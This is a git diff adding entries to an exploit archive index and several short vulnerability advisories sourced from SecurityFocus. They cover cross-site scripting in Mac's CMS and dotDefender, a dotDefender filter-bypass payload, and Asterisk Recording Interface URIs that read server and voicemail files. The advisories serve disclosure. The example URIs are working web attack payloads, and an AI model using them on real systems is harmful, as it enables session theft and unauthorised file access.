diff --git a/files.csv b/files.csv
index 5427c961e..d5f4322b9 100755
--- a/files.csv
+++ b/files.csv
@@ -30880,3 +30880,16 @@ id,file,description,date,author,platform,type,port
34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0
34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0
34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 'modules.php' Multiple SQL Injection Vulnerabilities",2009-12-22,"Hadi Kiamarsi",php,webapps,0
+34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 'searchString' Parameter Cross Site Scripting Vulnerability",2010-07-11,10n1z3d,java,webapps,0
+34291,platforms/php/webapps/34291.txt,"Joomla! Rapid-Recipe Component HTML Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
+34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 Multiple Cross Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
+34293,platforms/java/webapps/34293.txt,"dotDefender 4.02 'clave' Parameter Cross Site Scripting Vulnerability",2010-07-12,"David K",java,webapps,0
+34294,platforms/php/webapps/34294.txt,"FireStats 1.6.5 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0
+34295,platforms/php/webapps/34295.txt,"RunCms 2.1 'magpie_debug.php' Cross Site Scripting Vulnerability",2010-07-11,"John Leitch",php,webapps,0
+34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 'css_optimiser.php' Cross Site Scripting Vulnerability",2010-07-11,"John Leitch",php,webapps,0
+34297,platforms/multiple/remote/34297.txt,"dotDefender Cross-Site Scripting Security Bypass Vulnerability",2010-07-09,SH4V,multiple,remote,0
+34298,platforms/php/webapps/34298.py,"CMS Made Simple Download Manager 1.4.1 Module Arbitrary File Upload Vulnerability",2010-07-11,"John Leitch",php,webapps,0
+34299,platforms/php/webapps/34299.py,"CMS Made Simple 1.8 'default_cms_lang' Parameter Local File Include Vulnerability",2010-07-11,"John Leitch",php,webapps,0
+34300,platforms/php/webapps/34300.py,"CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload Vulnerability",2010-07-11,"John Leitch",php,webapps,0
+34301,platforms/multiple/remote/34301.txt,"Asterisk Recording Interface 0.7.15/0.10 Multiple Vulnerabilities",2010-07-12,TurboBorland,multiple,remote,0
+34302,platforms/php/webapps/34302.txt,"Diem 5.1.2 Multiple Cross Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",php,webapps,0
diff --git a/platforms/java/webapps/34290.txt b/platforms/java/webapps/34290.txt
new file mode 100755
index 000000000..c9ed3c175
--- /dev/null
+++ b/platforms/java/webapps/34290.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41529/info
+
+Mac's CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Mac's CMS 1.1.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php/footer/search?searchString='>
\ No newline at end of file
diff --git a/platforms/java/webapps/34293.txt b/platforms/java/webapps/34293.txt
new file mode 100755
index 000000000..45a3d12c3
--- /dev/null
+++ b/platforms/java/webapps/34293.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/41541/info
+
+dotDefender is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+dotDefender 4.02 is vulnerable; other versions may also be affected.
+
+The following example URI is available:
+
+http://www.example.com/oportunidades/presencial/buscador/sinresultado/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{
\ No newline at end of file
diff --git a/platforms/multiple/remote/34297.txt b/platforms/multiple/remote/34297.txt
new file mode 100755
index 000000000..f0169bfe7
--- /dev/null
+++ b/platforms/multiple/remote/34297.txt
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/41560/info
+
+dotDefender is prone to a security-bypass vulnerability because it fails to restrict malicious data from reaching protected sites.
+
+Remote attackers can exploit this issue to bypass security restrictions and to launch cross-site scripting attacks.
+
+ //POST
+
+ //GET
+
+EXAMPLES:
+
+Blocked:
+http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=%22{var%20{3:s,2:h,5:a,0:v,4:n,1:e}=%27earltv%27}[self][0][v%2Ba%2Be%2Bs]%28e%2Bs%2Bv%2Bh%2Bn%29%28/0wn3d/.source%29%22%20/%3E
+
+Unblocked:
+http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E
diff --git a/platforms/multiple/remote/34301.txt b/platforms/multiple/remote/34301.txt
new file mode 100755
index 000000000..b08a97b06
--- /dev/null
+++ b/platforms/multiple/remote/34301.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/41571/info
+
+The Asterisk Recording Interface is prone to the following issues:
+
+1. Multiple security bypass vulnerabilities.
+2. A cross-site request-forgery vulnerability.
+3. A cross-site scripting vulnerability.
+
+Attackers can exploit these issues to steal cookie-based authentication credentials, gain unauthorized access to the application, bypass certain security restrictions, disclose sensitive information, or cause denial-of-service conditions.
+
+The following example URIs are available:
+
+http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F2627&selected7=/var/www/recordings/index.php
+
+http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=INBOX&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F4949&selected7=%2Fvar%2Fspool%2Fasterisk%2Fvoicemail%2Fhouston%2F2625%2FINBOX%2Fmsg0000.txt
+
diff --git a/platforms/php/webapps/34291.txt b/platforms/php/webapps/34291.txt
new file mode 100755
index 000000000..cd2704acc
--- /dev/null
+++ b/platforms/php/webapps/34291.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41531/info
+
+Joomla! Rapid-Recipe component is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+The following example input is available:
+
+">>